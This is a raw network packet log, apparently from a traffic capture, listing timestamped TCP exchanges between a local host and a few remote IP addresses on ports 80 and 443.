                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.401530981 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.401781082 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.402437925 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.402478933 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.403090954 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.403207064 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.403487921 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.403558969 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.403605938 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.403647900 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.404580116 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.404592991 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.404616117 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.404630899 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.405666113 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.405704021 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.405791998 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.405834913 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.406704903 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.406802893 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.406852007 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.407814026 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.408247948 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.408399105 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.408454895 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.408947945 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.408987999 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.409157991 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.409220934 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.410126925 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.410167933 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.410871029 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.410916090 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.411123991 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.411142111 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.411166906 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.411180973 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.412149906 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.412189960 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.534909964 CET49992443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.534970045 CET44349992104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.535037041 CET49992443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.535320044 CET49992443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.535331011 CET44349992104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.547815084 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.547868013 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.547930002 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.547970057 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.548415899 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.548471928 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.548475981 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.548513889 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.549866915 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.549917936 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.550551891 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.550563097 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.550575018 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.550600052 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.550626040 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.551868916 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.551881075 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.551914930 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.551928043 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.553055048 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.553105116 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.553227901 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.553267956 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.553967953 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.554008007 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.554727077 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.554764032 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.554852009 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.554862976 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.554889917 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.554915905 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.556098938 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.556147099 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.556691885 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.556732893 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.556946039 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.556957006 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.557050943 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.558198929 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.558212996 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.558243036 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.558254004 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.559355021 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.559401989 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.559973955 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.560019970 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.560235977 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.560272932 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.561037064 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.561086893 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.561332941 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.561374903 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.562371016 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.562381983 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.562393904 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.562414885 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.562443972 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.563486099 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.563527107 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.563823938 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.563863039 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.564604998 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.564661980 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.564889908 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.564928055 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.565843105 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.565896034 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.565995932 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.566036940 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.566905022 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.566956997 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.567235947 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.567272902 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.568116903 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.568156004 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.568320036 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.568357944 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.568959951 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.569272041 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.569365978 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.569406033 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.570209980 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.570255041 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.570272923 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.570312977 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.571155071 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.571203947 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.571321011 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.571357012 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.572208881 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.572220087 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.572257996 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.573265076 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.573327065 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.573441029 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.573496103 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.574438095 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.574481010 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.574716091 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.574873924 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.575356007 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.575412989 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.575798035 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.575838089 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.576473951 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.576486111 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.576527119 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.577598095 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.577716112 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.577748060 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.577789068 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.578564882 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.578825951 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.578874111 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.579674006 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.579725981 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.579832077 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.579873085 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.580782890 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.580822945 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.581090927 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.581130981 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.581810951 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.581850052 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.582099915 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.582138062 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.582909107 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.582959890 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.583017111 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.583056927 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.584105968 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.584150076 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.584266901 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.584301949 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.585089922 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.585129976 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.585396051 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.585444927 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.586186886 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.586227894 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.586394072 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.586431980 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.587277889 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.587325096 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.587481022 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.587523937 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.588341951 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.588383913 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.588658094 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.588696957 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.589416981 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.589468956 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.589799881 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.589854956 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.590514898 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.590562105 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.590861082 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.590903997 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.591607094 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.591650963 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.591809034 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.591846943 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.592797041 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.592840910 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.592945099 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.592988968 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.593869925 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.593914032 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.594230890 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.594270945 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.594822884 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.594890118 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.595187902 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.595262051 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.595995903 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.596048117 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.596276999 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.596316099 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.597060919 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.597100019 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.597202063 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.597735882 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.598117113 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.598220110 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.598274946 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.599138021 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.599549055 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.599590063 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.600260019 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.600298882 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.600435019 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.600482941 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.601326942 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.601370096 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.601527929 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.601568937 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.602488041 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.602538109 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.602559090 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.602613926 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.603490114 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.603533030 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.603681087 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.603820086 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.604594946 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.604634047 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.679863930 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.679927111 CET4995780192.168.2.680.82.65.70
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.742546082 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.742729902 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.742780924 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.742902994 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.742913961 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.742949963 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.743999958 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.744052887 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.744246006 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.744975090 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.745101929 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.745137930 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.745249033 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.745295048 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.746126890 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.746290922 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.746334076 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.747191906 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.747697115 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.747725010 CET8049969185.215.113.16192.168.2.6
